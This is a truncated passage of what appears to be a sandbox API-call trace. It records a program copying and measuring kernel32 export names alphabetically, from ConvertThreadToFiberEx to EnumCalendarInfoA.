lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.589] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.589] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.589] lstrlenA (lpString="COPYFILEA") returned 9 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.589] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.589] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.589] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.590] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.590] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.590] lstrlenA (lpString="COPYFILEW") returned 9 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.590] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.590] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.590] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.590] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.590] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.590] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.590] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.590] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.590] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.590] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.590] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.590] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.590] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.590] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.590] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.590] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.591] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.591] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.591] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.591] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.591] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.591] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.591] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.591] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.591] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.591] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.591] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.591] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.591] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.591] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.591] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.591] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.591] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.591] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.591] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.592] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.592] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.592] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.592] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.592] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.592] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.592] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.592] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.592] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.592] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.592] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.592] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.592] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.592] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.592] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.592] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.592] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.592] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.593] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.593] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.593] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.593] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.593] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.593] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.593] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.593] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.593] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.593] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.593] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.593] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.593] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.593] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.593] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.593] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.593] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.593] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.593] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.594] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.594] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.594] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.594] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.594] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.594] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.594] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.594] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.594] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.594] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.594] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.594] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.594] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.594] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.594] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.594] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.594] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.594] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.594] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.595] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.595] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.595] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.595] lstrlenA (lpString="DELETEATOM") returned 10 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.595] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.595] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.595] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.595] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.595] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.595] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.595] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.595] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.595] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.595] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.595] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.595] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.595] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.595] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.595] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.596] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.596] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.596] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.596] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.596] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.596] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.596] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.596] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.596] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.596] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.596] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.596] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.596] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.596] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.596] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.596] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.596] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.596] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") 